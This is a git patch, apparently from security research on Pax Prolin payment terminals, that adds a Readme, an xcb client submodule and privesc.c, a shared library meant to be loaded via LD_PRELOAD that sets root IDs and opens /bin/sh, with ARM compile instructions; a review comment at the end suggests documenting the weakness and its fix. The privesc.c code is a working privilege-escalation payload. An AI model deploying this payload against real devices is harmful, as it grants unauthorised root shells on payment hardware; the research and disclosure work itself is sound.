From 499c1e91e8c0ea41fce4c0c79e802a739244e6f2 Mon Sep 17 00:00:00 2001
From: Giulio
Date: Mon, 1 Jun 2020 10:15:17 +0200
Subject: [PATCH] Added privesc code and xcb-client
---
 .gitmodules | 3 +++
 code/Readme.md | 12 ++++++++++++
 code/privesc.c | 14 ++++++++++++++
 code/prolin-xcb-client | 1 +
 4 files changed, 30 insertions(+)
 create mode 100644 .gitmodules
 create mode 100644 code/Readme.md
 create mode 100644 code/privesc.c
 create mode 160000 code/prolin-xcb-client
diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..fecd6a1
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "code/prolin-xcb-client"]
+ path = code/prolin-xcb-client
+ url = https://git.lsd.cat/g/prolin-xcb-client
diff --git a/code/Readme.md b/code/Readme.md
new file mode 100644
index 0000000..eda995f
--- /dev/null
+++ b/code/Readme.md
@@ -0,0 +1,12 @@
+## prolin-xcb-tools
+Python-ADB fork in order to communicate with the Pax `xcbd` daemon. Supports natively directory listing, reading and writing. Port forwarding may be done trough the original `xcb` client.
+
+## privesc.c
+The shared library used for privilege escalation.
+
+Compile with:
+
+```
+arm-none-eabi-gcc -shared -fPIC -o privesc.so privesc.c -nostartfiles -static
+```
+
diff --git a/code/privesc.c b/code/privesc.c
new file mode 100644
index 0000000..eb815de
--- /dev/null
+++ b/code/privesc.c
@@ -0,0 +1,14 @@
+#include
+#include
+#include
+#include
+
+int _init() {
+ unsetenv("LD_PRELOAD");
+ puts("LD_PRELOAD is working!");
+ setreuid(0, 0);
+ setuid(0);
+ printf("UID: %d. EUID: %d.\n", getuid(), geteuid());
+ system("/bin/sh");
+ exit(0);
+}
diff --git a/code/prolin-xcb-client b/code/prolin-xcb-client
new file mode 160000
index 0000000..8d00509
--- /dev/null
+++ b/code/prolin-xcb-client
@@ -0,0 +1 @@
+Subproject commit 8d00509ab221200388da9be68f406c7982f9cf60
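Review bot: code/privesc.c has no comment saying which weakness it demonstrates, and the Readme entry ("The shared library used for privilege escalation") does not say either, so a reader cannot tell what has to be fixed on the device. A header comment along the lines of `/* PoC: the target process accepts LD_PRELOAD from its environment while able to become root; remediation is to start it with a sanitized environment and without root privileges */` would record the finding and the fix together; the affected process is not named anywhere in this patch, so that wording is an assumption to confirm against the write-up. In `_init`, the results of `setreuid(0, 0)` and `setuid(0)` are ignored, so the shell is started even when the process never held root, and the printed `UID`/`EUID` line is the only evidence either way. A one-line comment on that `printf` saying a non-zero value means the condition is not present would keep a negative test result from being misread.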